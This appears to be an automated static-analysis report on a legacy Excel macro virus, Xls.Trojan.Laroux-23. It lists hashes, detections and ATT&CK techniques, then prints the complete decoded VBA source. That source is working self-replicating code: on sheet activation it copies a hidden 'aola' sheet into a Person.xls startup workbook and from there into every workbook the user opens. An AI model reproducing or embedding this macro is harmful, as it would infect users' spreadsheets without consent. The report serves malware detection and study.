Xls.Trojan.Laroux-23 — Office (OLE) malware analysis

Static analysis result for SHA-256 5da1189149215a24…

MALICIOUS

Office (OLE)

Size: 35.0 KB
Created: 1999-02-08 09:24:15
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 3783f808ba2d6a7e69de1887774e3b10
SHA-1: 87aed347025c53d5f7a335dbecbe75cd9092ee73
SHA-256: 5da1189149215a241b167b4f4c420f5f6d4e58a45de982d2f20b30153b0e8948
Risk Score: 240

Malware Insights

Xls.Trojan.Laroux-23 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is identified as a malicious Excel 5.0 macro virus, specifically Xls.Trojan.Laroux-23. Its Auto_Open macro registers the AutoCopy routine as the sheet-activation handler, and AutoCopy copies the current workbook's 'aola' sheet into a new file named 'Person.xls' in the application's startup path, likely to establish persistence or facilitate payload delivery. This behavior is characteristic of macro-based malware.

Heuristics 4

  • ClamAV: Xls.Trojan.Laroux-23 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Laroux-23
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster (severity: critical, rule: OLE_XLS5_LAROUX_MACRO_VIRUS)
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Auto_Open macro (severity: high, rule: OLE_VBA_AUTO)
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1930 bytes
SHA-256: 38e81a0cd7c643e859912af0ebf1478df535c06c05e500c1ed9904a510362bdb

Detection
ClamAV: Xls.Trojan.Laroux-23
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "aola"










Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error Resume Next
    Application.OnSheetActivate = "AutoCopy"
End Sub

Sub AutoCopy()
Attribute AutoCopy.VB_ProcData.VB_Invoke_Func = " \n14"
    Dim sStPath, sFile, swName, swnew, sCurDir As String
    Dim bPtoF, bFtoP As Boolean
    
    bPtoF = False
    bFtoP = False
    On Error Resume Next
    sStPath = Application.StartupPath
    sFile = Dir(sStPath & "\" & "Person.xls")
    
    bFtoP = sFile <> "Person.xls"
    
    bPtoF = Not (bFtoP And (ActiveWorkbook.Modules.Count > 0))
    
    If bFtoP Then
        Application.ScreenUpdating = False
        swName = ActiveWorkbook.Name
        Sheets("aola").Visible = True
        Sheets("aola").Select
        Sheets("aola").Copy
        swnew = ActiveWorkbook.Name
        sCurDir = CurDir()
        
        ChDir Application.StartupPath
        ActiveWindow.Visible = False
        Workbooks(swnew).SaveAs FileName:=Application.StartupPath & "/" & "Person.xls", FileFormat:=xlNormal _
            , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
            False, CreateBackup:=False
        ChDir sCurDir
        Workbooks(swName).Sheets("aola").Visible = False
        ActiveWindow.ActivateNext
    End If
    
    If bPtoF And (Not bFtoP) Then
        swnew = ActiveWorkbook.Name
        Application.ScreenUpdating = False
        sCurDir = ActiveWorkbook.Path
        If Workbooks(swnew).Sheets(1).Name <> "aola" Then
            Workbooks("Person.xls").Sheets("aola").Copy before:=Workbooks(swnew).Sheets(1)
            Workbooks(swnew).Sheets("aola").Visible = False
            Workbooks(swnew).Save
        End If
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "Person.xls!AutoCopy"
End Sub